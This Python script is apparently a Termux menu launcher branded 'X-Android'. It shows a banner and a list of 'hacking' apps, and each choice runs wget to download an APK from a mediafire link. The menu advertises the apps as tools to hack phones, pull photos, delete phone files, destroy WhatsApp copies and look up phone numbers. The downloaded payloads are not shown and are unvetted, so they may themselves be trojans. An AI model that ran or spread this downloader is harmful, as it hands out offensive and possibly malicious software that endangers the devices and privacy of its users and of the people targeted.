import os.path
from os import *
import sys
import time
R='\033[1;31m'
G='\033[1;32m'
Y='\033[1;33m'
C='\033[1;36m'
X = '\033[1;33m' #اصفر
W='\033[1;37m'
A='\033[1;35m'
xan = ('''_________________________________________________________

\033[1;33m##    ##    #        ####  ##   ##  ########  ###### 
##    ##    ##     ##      ##  ##   ##         ##  ##
\033[1;35m##    ##   ###    ##       ## ##    ##         ##  ##
########   # ##  ##        ####     ########   \033[1;36m#####
##    ##  ######  ##       ## ##    ##         ##  #
##    ##  #   ###  ##      ##  ##   ##         ##  ## 
\033[1;32m##    ## ###  ####   ####  ##   ##  ########  ###  ###
 
 X-\033[1;36mA\033[1;33mN\033[1;31mD\033[1;35mR\033[1;36mO\033[1;33mI\033[1;31mD 
 \033[1;31m
\033[1;35m Telegram:>\033[1;32mhttps://t.me/X1Android
 \033[1;35mFacebook:>\033[1;32mhttps://www.facebook.com/X.11Android
________________________________________________________
 ''')
system('sleep 3.9')
for e in xan:
    sys.stdout.write(e)
    sys.stdout.flush()
    time.sleep(5/400)
system('sleep 0.2')
print ( X + '  Please select the application' )
system('sleep 0.2')
print ( G + ' < '+ W + '==' + G + '[' + R + '↓↓↓Hack Phone↓↓↓' + G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '1' + G + ']' + W + '==' + G + '[' + C + 'Download an app X-Android-Hack' + G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '2' + G + ']' + W + '==' + G + '[' + C + 'Download an app numbers in you' + G +']')
system('sleep 0.2')
print ( G + ' < ' + W + '==' + G + '[' + R + '↓↓↓Hack drag photos↓↓↓' + G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '3' + G + ']' + W + '==' + G + '[' + C + 'Download an app Hacker stroge ' + G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '4' + G + ']' + W + '==' + G + '[' + C + 'Download an app Termux-phone' + G +']')
system('sleep 0.2')
print ( G + ' < '+ W + '==' + G + '[' + R + '↓↓↓Useful apps↓↓↓' + G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '5' + G + ']' + W + '==' + G + '[' + C + 'Download an app HACKER-META' + G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '6' + G + ']' + W + '==' + G + '[' + C + 'Download an app numbers in you1 ' + G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '7' + G + ']' + W + '==' + G + '[' + C + 'Download an app Delete phone files'+ G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '8' + G + ']' + W + '==' + G + '[' + C + 'Download an app Destroy WhatsApp copies'+ G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '9' + G + ']' + W + '==' + G + '[' + C + 'Download an app Information about the number'+ G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '10' + G + ']' + W + '==' + G + '[' + C + 'Download an app ^_^ X,,Android--V3'+ G +']')
system('sleep 0.2')
print ( G + ' < [' + R + '00' + G + ']' + W + '==' + G + '[' + R + 'Exit' + G +']')
system('sleep 0.2')
s = input (G+'        •~ ' +A +'Choose the number' +C +' >> ')
if s == '1':
	os.system("wget https://download1482.mediafire.com/66cpgglh6jag/cb7it4kavrut32s/X-Android_Hack.apk")
	os.system("clear")
	print (A+' X-Android_Hack.apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '2':
	os.system("wget https://download1322.mediafire.com/zini4yzxsj8g/bynxd1zc8a23vyp/numbers+in+you.apk")
	os.system("clear")
	print (A+' numbers+in+you.apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '3':
	os.system("wget https://download1521.mediafire.com/41shswgnfwyg/74s2mtm7gsp7toy/%F0%9F%98%88Hacker+stroge+%F0%9F%9B%90.apk")
	os.system("clear")
	print (A+' Hacker+stroge.apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '4':
	os.system("wget https://download1580.mediafire.com/lwalrzhez6mg/9m3v6qrbw7f3za3/Termux-phone.apk")
	os.system("clear")
	print (A+' Termux-phone.apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '5':
	os.system("wget https://download1075.mediafire.com/ea8jjak0iotg/7anx8xgxk0y8gqr/HACKER-META.apk")
	os.system("clear")
	print (A+' HACKER-META.apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '6':
	os.system("wget https://download1497.mediafire.com/84y04cgwazng/pv22bi1956emm52/numbers+in+you1.apk")
	os.system("clear")
	print (A+' numbers+in+you1.apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '7':
	os.system("wget https://download1519.mediafire.com/ttdixnn36uug/z67p4ped2g5n2as/Delete+phone+files.apk")
	os.system("clear")
	print (A+' Delete+phone+files.apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '8':
	os.system('wget https://download1980.mediafire.com/kcqdn7hgq9pg/qx8i88rxfb6jrfo/Destroy+WhatsApp+copies.apk')
	os.system("clear")
	print (A+' Destroy+WhatsApp+copies.apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '9':
	os.system("wget https://download855.mediafire.com/ykasmihsms9g/gjl5xrz5don8g2x/Information+about+the+number.apk")
	os.system("clear")
	print (A+' Information+about+the+number.apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '10':
	os.system('wget https://download2267.mediafire.com/mn062itfhvog/5k6tvr10nhq9o42/%5E_%5E+X%2C%2CAndroid--V3+1.0.apk')
	os.system("clear")
	print (A+' ^_^ X,,Android--V3 .apk' +G+ ' /done√')
	system('sleep 3.5')
	os.system("clear")
	system('sleep 1.5')
	os.system("python Hack.py")
elif s == '00':
  os.system('clear')
  sys.exit()
elif s == 'help 1':
	print (G+'  X-Android-Hack')
else :
 	print (R+60*' Error ')
 	system('sleep 0.9')
 	os.system('clear')
 	sys.exit()